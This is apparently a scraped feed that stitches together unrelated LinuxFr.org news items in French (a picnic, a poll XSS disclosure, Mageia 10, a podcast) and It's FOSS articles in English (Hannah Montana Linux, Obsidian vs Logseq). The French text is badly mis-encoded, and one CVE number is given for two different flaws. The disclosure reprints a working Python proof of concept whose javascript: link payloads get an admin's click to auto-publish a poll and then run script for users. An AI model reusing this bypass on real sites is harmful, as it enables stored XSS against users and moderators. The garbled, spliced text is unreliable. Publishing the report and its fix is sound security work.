DĂšs que lâon recommence Ă avoir des journĂ©es ensoleillĂ©es et chaudes, nous savons tous et toutes que la saison des pique-niques est arrivĂ©e ! Nous aimons, Ă nâen pas douter, absolument tout du concept des pique-niques: manger Ă lâextĂ©rieur sous le soleil ou Ă lâombre des arbres, partager un repas convivial, simple, Ă la bonne franquette entre amis, avec la famille, profiter de la beautĂ© de la nature qui nous entoure, prendre son temps et apprendre Ă ralentir et Ă reconnecter au moment prĂ©sent le temps dâun repas.
MĂȘme si lâĂ©tĂ© est dĂ©jĂ bien entamĂ©, nous avons encore beaucoup de belles journĂ©es chaudes Ă venir et la chance de faire de nombreux pique-niques avant la fin de la saison estivale.
Afin de favoriser lâĂ©change et la convivialitĂ©, nous vous invitons Ă participer Ă ces repas partagĂ©s. Chaque participant est encouragĂ© Ă apporter un plat fait maison (entrĂ©e, plat principal, dessert, fruits, boissonsâŠ) Ă partager avec les autres. Câest lâoccasion de dĂ©couvrir de nouvelles saveurs tout en Ă©changeant des idĂ©es et des expĂ©riences autour, vous lâaurez devinĂ©, des logiciels libres.
Ces rencontres sont aussi lâoccasion de discuter des projets communautaires, dâapprendre ensemble, et de promouvoir un mode de vie plus libre, collaboratif et respectueux de lâenvironnement. NâhĂ©sitez pas Ă apporter Ă©galement des jeux de plein air ou des instruments de musique pour ajouter encore plus de convivialitĂ© et de bonne humeur Ă ces moments partagĂ©s en pleine nature que nous affectionnons tous et toutes.
Commentaires : voir le flux Atom ouvrir dans le navigateur
Ce titre est celui dâun courriel reçu le samedi 20 juin 2026 en fin de soirĂ©e. La France est alors au milieu de sa deuxiĂšme canicule de lâannĂ©e, et moi en train de produire la dĂ©pĂȘche De la fermeture des comptes inactifs depuis 3 ans que je pensais initialement en avance et qui Ă©tait finalement en retard.
Et donc recevoir un tel message nâannonçait rien de bien rafraĂźchissant. (MĂȘme si ça changeait des week-ends successifs dâannonces de failles de sĂ©curitĂ© noyau Ă dĂ©ployer plus ou moins en urgence)
Pourtant il sâagissait du signalement dâune faille rĂ©elle, fait de façon dĂ©taillĂ©e, claire et pĂ©dagogique. Ăa change du bruit de fond habituel sur Internet avec son lot de tentatives diverses et variĂ©es dâinjections chimĂ©riques mi-SQL mi-Javascript mi-PHP, et ses fameux audits de sĂ©curitĂ© non-sollicitĂ©s et dĂ©licieusement bourrins. Grand merci donc Ă 0xMitsurugi H pour avoir explicitĂ© le problĂšme.
(avec lâautorisation de lâauteur « mon code et le rapport sont open source »)
Bonjour,
Jâai lu le code source de linuxfr.org et je me suis intĂ©ressĂ© aux sondages.
Jâai lâimpression que certains échappements HTML ne fonctionnent pas trĂšs bien.
Il est possible de bypasser la regexp dans les réponses du sondage et
injecter du javascript dans les réponses.
En soi, ce ne serait pas grave, car un sondage doit ĂȘtre validĂ© par un admin
pour que les utilisateurs le voient.
Lâastuce ici consiste Ă utiliser une rĂ©ponse avec du js qui fera valider
automatiquement le sondage par un admin, et mettre un second javascript
dans une autre réponse destiné aux utilisateurs, une fois le sondage
validé, permettant la compromission de tous les utilisateurs qui vont
cliquer sur le sondage.
Voici le poc en python (inliné dans le mail car google fait des dingueries
avec les piĂšces jointes en python):
#!/usr/bin/env python3
r"""
PoC â XSS stockee via linkify dans les reponses de sondage linuxfr.org
Vecteur : active au clic
Bypass regex : tagged template ` func`arg` ` au lieu de func('arg')
- document.querySelector`.ok_button` au lieu de
document.querySelector('.ok_button')
- form.submit`` au lieu de form.submit()
- alert`msg` au lieu de alert('msg')
Aucune parenthese `)` n'apparait dans l'URL markdown, donc la regex
\[([^\]]*)\]\(([^)]*)\) ne peut rien manger.
Contrainte : 128 caracteres max (PollAnswer)
Phase 1 : 64 car. (form.submit pour auto-publication)
Phase 2 : 54 car. (alert de preuve)
Deroulement :
1. Attaquant cree un sondage avec les payloads XSS
2. Moderateuur visite /moderation/sondages/ID et clique sur [a]
3. La publication se fait sans boite de confirmation
4. Les visiteurs cliquent sur [b] -> alerte JavaScript
Usage :
python3 poc.py <url> <user_session>
<url> : racine du site (ex: http://dlfp.lo)
<user_session> : valeur du cookie linuxfr.org_session (compte standard)
Exemple :
python3 poc.py http://dlfp.lo "user_session_value"
Prerequis :
pip install requests
"""
import re
import sys
from urllib.parse import urljoin, urlparse
import requests
def e(msg: str, code: int = 1) -> None:
print(f"[-] {msg}")
sys.exit(code)
def s(msg: str) -> None:
print(f"[+] {msg}")
def info(msg: str) -> None:
print(f"[*] {msg}")
def banner() -> None:
print("=" * 68)
print(" PoC â XSS linkify -> Auto-validation + XSS proof")
print(" Vecteur : tagged templates dans href (pas de ) necessaire)")
print(" Cible : linuxfr.org")
print("=" * 68)
def make_session(cookie_value: str, target_url: str) -> requests.Session:
s = requests.Session()
hostname = urlparse(target_url).hostname
s.cookies.set("linuxfr.org_session", cookie_value, domain=hostname)
return s
def create_poll(url: str, session: requests.Session,) -> tuple[str, str]:
"""
Cree un sondage avec les reponses malveillantes.
"""
# RĂ©ponse 1 : 64 car. â form.submit() via tagged template
# document.querySelector`.ok_button` => querySelector('.ok_button')
# form.submit`` => form.submit()
payload_phase1 = (
"[a]"
"(javascript:document.querySelector"
"`.ok_button`.form.submit``)"
)
# RĂ©ponse 2 : 54 car. â alert via tagged template
payload_phase2 = (
"[b]"
"(javascript:alert"
"`smile this is your favorite XSS`)"
)
info("Chargement du formulaire de creation...")
r = session.get(urljoin(url, "/sondages/nouveau"))
csrf = re.search(
r'name="authenticity_token" value="([^"]*)"', r.text
)
csrf = csrf.group(1)
info("Creation du sondage malveillant...")
r = session.post(urljoin(url, "/sondages"), data={
"authenticity_token": csrf,
"poll[title]": "PoC XSS â tagged template",
"poll[wiki_explanations]": (
"Cliquez sur les liens ci-dessous !"
),
"poll[cc_licensed]": "1",
"poll[answers_attributes][0][answer]": payload_phase1,
"poll[answers_attributes][1][answer]": payload_phase2,
})
if r.status_code not in (200, 302):
e(f"Creation echouee (HTTP {r.status_code})")
print("Connectez vous en tant qu'admin et cliquez sur la réponse A")
def main():
banner()
if len(sys.argv) != 3:
print(f"Usage: {sys.argv[0]} <url> <user_session>")
print()
print("Exemple :")
print(f' {sys.argv[0]} http://dlfp.lo "SESSION_USER"')
sys.exit(1)
target_url = sys.argv[1].rstrip("/")
user_session_val = sys.argv[2]
user_session = make_session(user_session_val, target_url)
# Creation du sondage malveillant
print()
info("Creation du sondage avec payloads XSS")
create_poll(target_url, user_session)
if __name__ == "__main__":
main()
Et je joins les copies dâĂ©cran dans lâordre :-)
CâĂ©tait sympa Ă trigger, je ne pensais pas arriver Ă quelque chose avec
lâautovalidation de lâadmin pour publier le sondage. Bon, il faut quand
mĂȘme lâinteraction dâun admin (dâoĂč le fait que ce nâest pas trĂšs grave),
jâai essayĂ© des trucs Ă base de onmouseover, mais je nâarrive Ă rien de
bien ce soir, il fait trop chaud.
Merci de gĂ©rer et maintenir le site linuxfr, jâai appris beaucoup de choses
en le lisant, mĂȘme si je ne suis quâun simple lecteur :-)
Merci de fournir le code source sur github, ça mâa permis de debug en live
mes tests.
Bonne soirée
Les cinq images étaient en piÚces jointes du signalement.
La dĂ©monstration Ă lâĆuvre :

En admin, le nouveau sondage dans la page des sondages :

En admin, cliquer sur un choix autovalide le sondage :

Et sur le sondage publiĂ©, un clic dâun compte utilisateur :

Paf la faille :

La faille signalée concerne le type de contenu sondages du site LinuxFr.org : un sondage est une question sur un thÚme donné ; le lectorat du site LinuxFr.org peut choisir parmi un ensemble de réponses proposées. (aide)
Une personne ayant un compte sur le site peut proposer un sondage (aide). Sa publication nĂ©cessite une approbation par lâĂ©quipe de modĂ©ration (aide).
Un sondage est composĂ© dâune partie question en Markdown. Et de (en gĂ©nĂ©ral) plusieurs rĂ©ponses dans un format exotique : câest du texte brut, pas de mises en forme en italique/gras ou autre, sauf que les liens au format Markdown [oh un lien](https://une.adresse.invalid) sont possibles, depuis 2012. Ce code pour gĂ©rer du supposĂ© texte brut mais acceptant des hyperliens Markdown, avec une expression rationnelle pour gĂ©rer, forcĂ©ment ça annonçait un hypothĂ©tique problĂšme Ă venir.
« Le cross-site scripting (abrégé XSS) est un type de faille de sécurité des sites web permettant d'injecter du contenu dans une page, provoquant ainsi des actions sur les navigateurs web visitant la page. » (Wikipedia) : ici on va glisser un sondage malveillant dans la base de données LinuxFr.org, une personne modératrice va aller le lire et déclencher involontairement la publication, qui devient alors visible par tout le monde, et chaque personne qui ira voter sur le sondage va déclencher un comportement non désiré. Bon en pratique, à ce moment là , ladite personne modératrice se rendrait alors compte du problÚme et dépublierait le sondage en catastrophe. Potentiellement trop tard pour quelques personnes du lectorat avides de sondages.
Bon si ça se trouve, la faille ne fonctionne pas, câest facile de tester et de voir si on reproduit. Bon on reproduitâŠ
En analysant le code et en testant, on voit quâil y a plusieurs soucis :
Donc on va ajouter un filtrage à la création sur les hyperliens pour ne laisser passer que les protocoles autorisés et que des adresses qui ressemblent à des adresses.
Et on va ajouter un filtrage Ă lâaffichage / conversion en HTML pour nâafficher que des hyperliens, dans les protocoles autorisĂ©s et avec une adresse qui ressemble Ă une adresse.
Ăvidemment il y a la contrainte de ne pas casser le fonctionnel et les sondages dĂ©jĂ prĂ©sents en base de donnĂ©es.
Donc on fait plein de tests un peu cracra :

Et on produit un commit de correction (si tout va bien).
On a aussi vĂ©rifiĂ© le contenu existant de la base, au cas oĂč.
Il ne restait plus quâĂ remercier le contributeur et Ă convenir dâune publication en dĂ©pĂȘche. Que voici.
Une contribution par une personne qui a lu le code source, qui a dĂ©ployĂ© le site, qui a Ă©crit un bout de code pour illustrer lâexploitation de la faille de bout-en-bout, qui a littĂ©ralement illustrĂ© lâexploitation avec cinq images et qui a accompagnĂ© le tout dâune explication dĂ©taillĂ©e et en fournissant le code. Que demander de plus ? Encore merci.
Ah oui il faut une ouverture finale et tenir en haleine le lectorat : cette dĂ©pĂȘche n'Ă©voque pas la derniĂšre faille signalĂ©e (ni mĂȘme l'avant-derniĂšre), et on n'est que douze jours aprĂšs.
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur
La nouvelle mouture de la distribution Linux communautaire Mageia est disponible : la version 10 fait sortir le manchot du chaudron ! Les personnes connaissant la distribution comprendront lâallusion ;-)  Cauldron â le chaudron â Ă©tant la version de dĂ©veloppement, il est naturel dâen obtenir une version installable stabilisĂ©e pĂ©riodiquement.
à vos téléchargements pour utiliser cette nouvelle mouture.
Cette version 10 de Mageia marque les 16 ans du lancement de la distribution (septembre 2010), elle sâinscrit dans la continuitĂ© de Mageia 9 qui nous a accompagnĂ©s et a Ă©voluĂ© depuis plus de 2 ans et œ   ;-)
Mageia 10 est classiquement proposĂ©e Ă lâinstallation avec diffĂ©rents choix :
task- (plasma, gnome, lxqt, lamp-php, edu, astronomyâŠ).Mises Ă jour des environnements de bureau
Au niveau des logiciels, GIMP 3.2.4 (GIMP 2.10 nâest plus disponible, mais Ă qui va-t-il manquer ?), FreeCAD 1.1.1, Inkscape 1.4.4, Mathmod 13.0âŠ

Mageia 10 est sans doute la derniĂšre version Ă proposer Plasma 6.5.5 et GNOME 49 pour X11. En effet, la version suivante GNOME 50 sortie rĂ©cemment commence les travaux de suppression de la prise en charge de X.org : câest Wayland qui est dĂ©sormais standard. Ceci explique certainement le fait que Mageia fait le choix de ne pas passer vers Gnome 50.
Concernant lâarchitecture 32 bits, ses jours^W mois sont sans doute comptĂ©s aussi : câest i686 qui est encore proposĂ© Ă lâinstallation (et non plus i586). Dommage pour les EeePC avec les processeurs Intel Atom N270 (dĂ©jĂ que la rĂ©solution dâĂ©cran de 1024x600 nâaidait pas trop :/). Pour les jeux, Wine 11.0 est fourni avec Wine-Wow64, permettant de bĂ©nĂ©ficier de meilleures performances et de faire fonctionner des applications et jeux 32 bits sans paquets dĂ©diĂ©s 32 bits, ce qui Ă©vite dâavoir Ă activer les dĂ©pĂŽts 32 bits sur une distribution x86_64.
Lors du cycle de publication de Mageia 10, des failles critiques du noyau Linux ont Ă©tĂ© prises en compte : CopyFail (CVE-2026-31431) par fourniture du noyau 6.18.22 et suivants incluant les correctifs, puis DirtyFrag (CVE-2026-46300, mise Ă jour noyau), puis Fragnesia (CVE-2026-46300), puis vulnĂ©rabilitĂ© dans ptrace (CVE-2026-46333, mise Ă jour noyau 6.18.30 avec patch pour get_dumpable dans ptrace, le noyau 6.18.31 incluant dĂ©jĂ le patch). Les mises Ă jour correspondantes pour le noyau 6.6.x LTS de Mageia 9 ont aussi Ă©tĂ© proposĂ©es, elles sont tracĂ©es dans les advisories Mageia MGASA- lorsque suivies par lâĂ©quipe sĂ©curitĂ© et dans le changelog du noyau (urpmq - i --changelog kernel-desktop-latest) lorsquâun patch est spĂ©cifiquement appliquĂ© (sinon voir le changelog de la version officielle du noyau).
Montées de versions successives de Firefox 140.6 à 140.11 LTS : consommation mémoire améliorée ?
Le paquet chromium-browser-stable 136 a Ă©tĂ© le dernier fourni en Mageia 9 et a dĂ» ĂȘtre abandonnĂ© par manque de mainteneur pour Mageia 10 : lâinstallation peut ĂȘtre effectuĂ©e via flatpak ou passer au paquet RPM de Chrome disponible chez Google. Si un nouveau mainteneur se manifeste, il pourrait redevenir disponible pour Mageia 10 via les updates, avis aux personnes motivĂ©es Ă devenir empaqueteur _o/ (mĂȘme si ce nâest clairement pas le paquet le plus simple pour commencer).
En contrepartie, des navigateurs pour le protocole Gemini ont été ajoutés : Lagrange (SDL), Kristall (Qt), Offpunk (CLI).
0ad 0.28 a été actualisé à la version « Bolorix ».
Flightgear en version 2024.1.5 un simulateur de vol ayant ses fans sur MLO (plus de 586 pages dans le fil du forum jeux).
Rocks 'n Diamonds est en version 4.4.1.2 (et a plus de 30 ans !)
Audacity en version 3.7.7 â la 3.7.8 Ă©tant sortie aprĂšs la rc1, Ă voir si elle fera son chemin dans les updates â pour profiter des greffons Tempo tracks, LADSPA, et analyseur Vamp tant quâils sont encore disponibles.
FreeCAD 1.1.1 pour la modĂ©lisation 3D en fablab intĂ©grĂ© lors du cycle de bĂȘta de Mageia 10 (Mars 2026) sera la derniĂšre suivant cette numĂ©rotation, le choix du passage Ă CalVer Ă©tant entĂ©rinĂ©
Inkscape 1.4.4 pour avoir une version de maintenance de la branche 1.4.x Ă jour apportant moins de plantages et plus de performances.
LibreOffice 26.2.3.2 la suite de bureau, à voir si la prochaine version à venir 26.8 sera ajoutée dans les updates pour la rentrée des classes ;-)
Les paquets pour le serveur et le client Nextcloud en version 32 font leur retour avec Mageia 10.
PrĂ©sent avec un stand Ă Capitole du libre en novembre 2025, au PSL XXL et visite Ă lâOSXP en dĂ©cembre 2025, JDLL fin mai 2026.
Nos amis de MageiaLinux-Online (MLO) sont toujours de la partie _o/ Tutoriels et forums en français vous accueillent. Rendez-vous à la rentrée pour install'parties et événements du Libre ;-)
Télécharger ce contenu au format EPUBCommentaires : voir le flux Atom ouvrir dans le navigateur

Comment rendre plus transparents les changements des conditions d'utilisation des grands services numériques ?
Pour ce nouvel épisode sur les communs numériques, nous partons à la découverte d'Open Terms Archive !
Open Terms Archive permet de suivre et alerter des changements qui se cachent dans ces documents peu compréhensibles.
Avec Sydney Wheeler et Matti Schneider nous revenons sur :
Commentaires : voir le flux Atom ouvrir dans le navigateur
Hannah Montana Linux (HML) has become a conversation starter in the land of FOSS (aka FOSSLand?), and somehow, the year is 2026. The remaster, released by Noah Cagle, a developer/YouTuber, has taken us by surprise.
This new avatar of HML is a combination of Debian Live tooling and the Calamares installer, with most of the makeover happening inside KDE Plasma, the desktop environment of choice here.
For anyone unfamiliar, the original Hannah Montana Linux was bestowed upon us in 2009, riding on Kubuntu 9.04 and KDE 4.2, drenched in hot pink Disney Channel branding.
It might sound like a fever dream, but it was a real, functioning operating system, and that absurdity is precisely what turned it into a long-running Linux meme that never quite died.

This variant of HML is built on Debian 13, with non-free repositories enabled from the beginning for easy access to proprietary hardware drivers. Noah used live-build, Debian's tool for building custom distributions, and a few custom flags to get this up and running.
Most of the visual changes you see here are the result of cloning Plasma assets and manually editing them. The "pretty pink" color scheme is a copy of Breeze with only the window header and button highlight colors changed.
The wallpaper is rebuilt from the original 2009 PNG file, resized for widescreen screens, with a recreated glitter effect and Hannah's cutout pasted back in.


The theme options and Calamares installer on HML.
Similarly, the icon pack ships with only one replacement icon for the kickoff start menu button, which was taken from the Hannah Montana logo. The panel's pink color comes from a separate Plasma theme, copied and recolored from Noir Dark's panel background SVG in Inkscape.
All of these pieces are bundled into one Global Theme for quick access.
For the installer, the default Debian installer was replaced in favor of Calamares, with the distro's existing Calamares-specific assets being reused and redesigned for use in HML to match the rest of the theme.
Noah has not hosted a dedicated website for this project, so you will have to make do with the GitLab repository that hosts the source code as well as the latest release of Hannah Montana Linux (v26.1 at the time of writing).
Hannah Montana LinuxBtw, the main release isn't the only option on offer. 👇
The HML26 Lite image swaps Plasma and SDDM for LXQt and LightDM, making HML a more suitable option for people running RAM-constrained, older hardware.
And if you already run Plasma and just want the look without needing to install a whole new operating system, the exquisite pink theme has its own standalone repository.
I must say, this is mostly a passion project, and only time will tell how maintained this new avatar of HML will be. If you just want to distrohop and see what this offers, then this is a great fit, but if you intend to daily drive it, your mileage may vary.
Suggested Read 📖: 14 Discontinued Linux Distros I Still Miss
Obsidian and Logseq may seem similar. Both are local-first note-taking apps, both use Markdown, and both are popular among people building their personal knowledge base.
But after using both for nearly three years, I can say this: they are not the same kind of tool. Obsidian feels like a powerful Markdown writing environment. Logseq feels like an outliner built for connecting ideas at the block level.
Both applications use Markdown as their primary note format. However, Logseq is also actively developing a database-based version alongside its traditional Markdown workflow.
I have written several tutorials on both Logseq and Obsidian here on It's FOSS. One of the frequently asked questions in the comments of those articles has been about the differences between Obsidian and Logseq.
Of course, the major difference is that Logseq is open source and Obsidian is not. Yes, Obsidian is one of those tools that feel like they are open source even when they are not.
But that major difference is not a difference for many. They want to know which tool they should use for their perfectly curated knowledge base.
So, I decided to compare both Logseq and Obsidian on certain points that I have noticed in my experience. Instead of trying to declare one as the winner, I'll explain where each application works well, where I struggled, and why I still use both in my daily workflow.
📋Choose Obsidian if you prefer traditional Markdown files, folders, long-form writing, strong plugins, and a polished mobile app.This is not a recommendation to switch to one application or the other. It is simply a collection of my experiences and the workflow that worked best for me.
Here is a quick comparison before we go into the details.
FeatureObsidianLogseqBest forLong-form notes, writing,How an application stores your notes is one of the most important aspects of any note-taking system. Fast access to your data and complete ownership of your notes are essential.
Fortunately, both Obsidian and Logseq follow a local-first approach.
Obsidian stores every note as a standard Markdown (.md) file inside a local folder called a Vault. Since all files remain on your computer by default, you have complete control over your data without depending on external servers or proprietary databases.
You can also create multiple vaults, allowing you to separate different projects or areas of work. Because everything is stored locally, your notes remain accessible even without internet connection.
Logseq also stores notes locally using Markdown and Org-mode files. However, the project is gradually moving toward a local SQLite database architecture to improve performance, stability, and query capabilities.
Even with this transition, the developers have stated that they intend to continue supporting the traditional Markdown-based workflow for users who prefer plain text notes.
Like Obsidian, Logseq also allows you to maintain multiple collections of notes and switch between them easily.
Although both applications use Markdown, the editing experience is fundamentally different.
Obsidian follows the traditional Markdown editing approach, where an entire file becomes the main unit of work.
It is well suited for writing long articles, detailed documentation, or structured notes that resemble conventional documents.
Obsidian for Long form Notes
Logseq is built around an outliner. Every line is a collapsible bullet, making each individual block the primary unit of information.
Outline Style notes in Logseq
Instead of thinking in pages, you naturally build ideas by nesting bullets and creating hierarchies through indentation.
I use Obsidian whenever I'm writing article drafts or other long-form documents. Its editor feels much more comfortable for continuous writing, and organizing paragraphs is straightforward.
If you're writing regular articles or lengthy notes, Logseq can sometimes feel restrictive because everything starts as a bullet point.
I especially notice this when working with a table of contents. In Obsidian, the document structure is easier to visualize because there isn't a bullet interface surrounding every paragraph.
On the other hand, Logseq is excellent for collecting ideas before writing. Its outline-based interface makes it easy to brainstorm, collapse large sections into a single line, and gradually expand ideas whenever needed.
When you maintain proper indentation, every parent bullet can almost act as a separate note with all of its supporting information nested underneath.
Linking related notes is one of the most important features of any PKM application because that's what separates it from just a random dump of notes and an organized, accessible knowledge base.
Obsidian connects notes by linking entire files using wiki-style links. It also includes a backlinks panel that shows every note linking to the current document.

To visualize these relationships, Obsidian provides an excellent graph view that displays how your notes connect with each other.
Logseq does things differently by introducing block-level references.
Instead of linking only to entire pages, you can directly reference or embed an individual bullet from anywhere in your knowledge base.
Like Obsidian, Logseq also includes a graph view to visualize relationships between notes.

When it comes to interlinked notes, I prefer Logseq every time. The biggest reason is block-level references.
Because Obsidian links entire files, I often end up creating many small notes just so they can be referenced from different places.
Logseq removes that need. If I organize my ideas using proper indentation, I can reference only the specific block I need while leaving the rest of the information in the same page.
Even better, hovering over a reference displays the complete parent block along with its nested content.
This allows me to keep large collections of related ideas together while still being able to reference individual parts wherever I need them.
There is one thing to keep in mind, though. This workflow depends heavily on proper indentation. If the structure becomes messy, references may not include all the information you expected.
Overall, I think Obsidian works better if you're intentionally following a Zettelkasten-style workflow with a strict "one idea, one note" philosophy.
Personally, I believe that Zettlekasten is one of the best ways to organize knowledge. The challenge is that maintaining such a system consistently can become difficult over time.
The way notes are organized on disk and inside the application is very different in Obsidian and Logseq.
Obsidian follows the traditional file and folder approach. You are free to create any folder structure you like inside a vault, whether it is deeply nested or completely flat.
This gives you complete control over how your knowledge base is organized.

While Logseq, instead of relying on folders, encourages you to organize information using daily journals, pages, tags, and block hierarchies.
Rather than maintaining a directory structure yourself, the organization gradually emerges through links and references.

For most casual users and students, I feel Obsidian's approach is much easier to understand.
Logseq's organization model can be confusing at first. By the time you fully understand how pages, tags, and journals work together, you may already have created hundreds of notes that need to be reorganized.
One thing that initially confused me was the relationship between pages and tags. In many situations, they almost behave like the same thing.
If you come from a traditional folder-based workflow, it's easy to start creating pages as if they were folders. That usually leads to confusion later when your notes begin to grow.
Obsidian, on the other hand, follows a familiar file-and-folder hierarchy that almost everyone already understands. Logseq's approach is certainly powerful, but it requires careful planning from the beginning.
Being able to move your notes between applications is an important consideration. If you ever decide to switch tools, a portable note format can save a lot of effort and frustration.
Obsidian stores everything as standard Markdown files. Because Markdown is widely supported, you can open your notes in almost any text editor without losing the main content.
This makes your notes easy to access in the future, regardless of whether you continue using Obsidian.
Logseq also stores notes in Markdown, but its heavy use of block structures and internal block identifiers makes those files less suitable for use in traditional Markdown editors.
While it do provide a way to export the current page to a proper markdown, the default note you created is always in a bullet-structure form.
Although Obsidian is highly portable, there are still a few things to keep in mind. Obsidian's wiki links are not part of the Markdown standard. If you open those files in another editor, internal links and embedded images may not work as expected.
The same applies to some Obsidian-specific features such as callout blocks.
Fortunately, Obsidian allows you to disable wiki links and use standard Markdown links instead. If long-term portability is important to you, this is a setting worth considering.

Logseq has similar limitations because it also extends Markdown with its own features.
Overall, I still find Obsidian's notes easier to migrate to other applications than Logseq's Markdown files.
A healthy plugin ecosystem can greatly extend the capabilities of a note-taking application.
Obsidian has one of the largest plugin ecosystems available. Thousands of community plugins can transform the editor into anything from a task manager to a database-like system using plugins such as Dataview.
Because the core application remains fairly minimal, many advanced features depend on community plugins.

Logseq has a much smaller plugin ecosystem. However, it includes many features that Obsidian users often install plugins for, including flashcards, PDF annotation, and advanced queries.
Its philosophy is to provide most of the commonly used PKM features as part of the default installation.

I actually give a thumbs up to the Obsidian's plugin model. Providing a simple editor and allowing users to choose only the features they need is a good design approach. Many modern applications, including Visual Studio Code, follow a similar philosophy.
The downside is that depending heavily on third-party plugins introduces additional security considerations.
Logseq takes the opposite approach by including most important features out of the box.
I repeat, one thing to remember for both applications is portability. Many plugins introduce their own syntax that goes beyond standard Markdown.
If your goal is to keep your notes compatible with other Markdown editors, it's worth being selective about which plugins you install.
Callout blocks are a good example. They work well inside the application but may not render correctly elsewhere.
If you regularly save articles while browsing, a good web clipper becomes an essential part of your workflow. Though, you only need one reliable web clipper.
Obsidian offers an excellent web clipper extension that is available for Chrome, Firefox, Safari, and other browsers.
It lets you save web pages as Markdown notes. When used with Obsidian, the clipped notes are automatically populated with useful YAML front matter such as the title, source URL, author, and other metadata.
At the time of writing, Logseq does not have an official web clipper. There have been ongoing discussions about one, but an official release is yet to arrive.
One thing I really like about the Obsidian Web Clipper is that it doesn't require Obsidian to be installed.
This means I can use it to save web pages as Markdown and then import those notes into other applications, including Logseq.
The only feature you miss without Obsidian is the ability to send clipped notes directly into a specific vault or folder with a single click. That integration naturally requires Obsidian to be installed.
Working on more than one computer? Sync is essential for your workflow.
Obsidian provides its own paid synchronization service called Obsidian Sync. I have used it extensively, and it has worked very well for me.
Since all notes remain local files, you can also use other synchronization solutions such as iCloud, Dropbox, or Syncthing instead of paying for the official service.
One thing worth mentioning is Android. Services like Dropbox and Google Drive do not automatically live synchronize a local folder in the background because of Android's storage restrictions.
This is not an Obsidian limitation. If you want continuous synchronization on Android, tools such as Syncthing generally provide a much better experience.
Logseq also offers its own paid synchronization service.
Users can choose alternatives such as iCloud, although it has been known to have occasional issues.
The upcoming database version is also expected to improve real-time synchronization and collaboration between multiple devices.
I personally don't use Logseq Sync. Instead, I keep my Logseq graph inside a private GitLab repository to avoid accidental data loss.
Because of that, I don't think it would be fair for me to compare the official synchronization services of both applications. If you've used both, I'd be interested in hearing about your experience in the comments.
A good note-taking application should work well on mobile devices too. After all, we don't always have a laptop with us.
Obsidian offers official mobile applications for both Android and iOS. In my experience, the app works very well, and Obsidian Sync integrates seamlessly across devices. Since I'm the only person using my vault, I haven't tested its collaboration features, so I won't comment on them.
Logseq's mobile experience is currently less polished. There isn't an official Android app for the legacy Markdown version on the Play Store.
Android users can still install it by downloading the APK from the official GitHub repository. iPhone users, however, have an official release available on the App Store.
The new database version is currently being developed with iOS as the primary focus, and an Android release is not expected anytime soon.
Regarding Obsidian, one thing I did notice is that the interface can feel a little crowded on smaller screens. The ribbon menus, sidebars, and other interface elements take up a fair amount of space. If you prefer larger fonts while reading or writing notes, the interface can feel even more compact.
I rarely use Logseq on my phone, so I don't think I can fairly judge its mobile experience. It will be unfair if I tried it for the sake of this article, so I leave it to those who use it frequently to judge it, and I'd love to hear your thoughts in the comments.
Git is not only an excellent version control system but also a reliable synchronization solution for users who prefer not to use paid cloud services.
Since an Obsidian vault is simply a folder containing Markdown files, it works naturally with Git.
You can store your vault in a private GitHub or GitLab repository and manage its history using standard Git workflows.
In this setup, version history depends entirely on Git rather than the application itself.
Git in Obsidian
Logseq also works well with Git when using the Markdown version. Its upcoming database architecture introduces another interesting feature.
Instead of relying entirely on Git history, the database is designed as a "time-travel database." Every change is stored as a timestamped transaction, allowing you to inspect previous states of your knowledge base directly from within the application.
Git in Logseq
Both applications provide community plugins that simplify Git operations through a graphical interface.
Between the two, I found Obsidian's Git plugin more polished and easier to understand. It exposes almost every Git operation you might need through a straightforward interface.
Ironically, I rarely use either plugin. I manage my repositories using Lazygit, so I generally prefer handling Git from the terminal.
The licensing model of an application doesn't necessarily affect how well it works, but it is still an important consideration for many users.
Obsidian is proprietary software. The application itself is closed source, meaning only the developers have access to its source code.
It is free for personal use, while commercial use requires a paid license. One important point is that many community plugins available for Obsidian are open source, even though the application itself is not.
Logseq is fully open source under the AGPL-3.0 license. Its source code is publicly available, and anyone can inspect, modify, or fork the project.
All local features are available without requiring any payment.
Almost every application I use daily is open source. Obsidian is one of the few exceptions.
There are several reasons for that. I've been using it for a long time, migrating my notes without breaking links would take considerable effort, and I simply don't have enough time to rebuild my entire knowledge base.
Another reason, is the writing experience. For long-form writing, Obsidian is still one of the fastest and most comfortable editors I've used.
My long-term goal is to move toward a completely plain-text, wiki-style note system, but that is still some distance away.
One of the first things you'll notice when trying a new PKM application is how it expects you to work.
Obsidian starts with a blank note or an existing document. From there, you're free to organize your vault however you like.
You can create folders, move notes between them, and rearrange your structure whenever needed.
Because Obsidian automatically updates internal links, reorganizing notes is generally painless.
Logseq is different. Every time you open the application, you're greeted by today's journal.
The idea is simple. Open the application, start writing, and organize everything later using links, pages, and tags.
This journal-first workflow is one of Logseq's biggest strengths, but it also comes with a learning curve.
Personally, I recommend spending some time understanding how Logseq works before filling it with notes.
Learning while building your knowledge base can easily lead to unnecessary pages, duplicate tags, and organizational problems that become frustrating to fix later. At least, that's exactly what happened to me.
A note-taking application should also be pleasant to use. If you enjoy the interface, you're more likely to keep coming back to read and write.
This is one area where Obsidian stands out. Thanks to its large community, there are hundreds of themes available, along with plugins that let you customize almost every part of the interface.
I personally use the Border theme most of the time. Combined with the Style Settings plugin, it lets me customize Obsidian exactly the way I want.
Occasionally, I switch to Retroma, which has a unique appearance that I really enjoy.
Retroma Theme in Obsidian
Logseq isn't far behind, but its theme ecosystem is much smaller.
There are still several good community themes available, although they don't offer the same level of customization as Obsidian.
I usually switch between the Immersion Dark and Bonofix Dark themes.
If you're comfortable editing CSS, you can customize Logseq even further. However, I wouldn't recommend that approach to beginners who simply want to install the application and start taking notes.
Both Obsidian and Logseq let you work with Markdown files, but moving an existing knowledge base from one application to the other is not as straightforward as it sounds. The biggest reason is the difference in how each application structures notes.
According to the documentation, you can import a folder of Markdown files into Logseq. In practice, however, the results may not always be ideal.
Because Logseq is built around an outline-based structure, imported Markdown files don't automatically adopt its bullet hierarchy. This becomes even more noticeable if you're using the Table of Contents plugin, where the structure may not appear as expected.
If you're particular about keeping your notes properly organized with consistent bullets and indentation, you'll likely have to spend time manually restructuring many of the imported notes.
Obsidian handles Logseq notes a little better. You can simply copy the Markdown files from Logseq's pages folder into an Obsidian vault, and the bullet structure is generally preserved. However, headings and overall formatting may still need some cleanup.
If you've built a large knowledge base in either application, migrating it perfectly to the other is difficult. The underlying architecture of the two applications is simply too different to make the process completely seamless.
Although both applications solve similar problems, I think they are designed for different kinds of users.
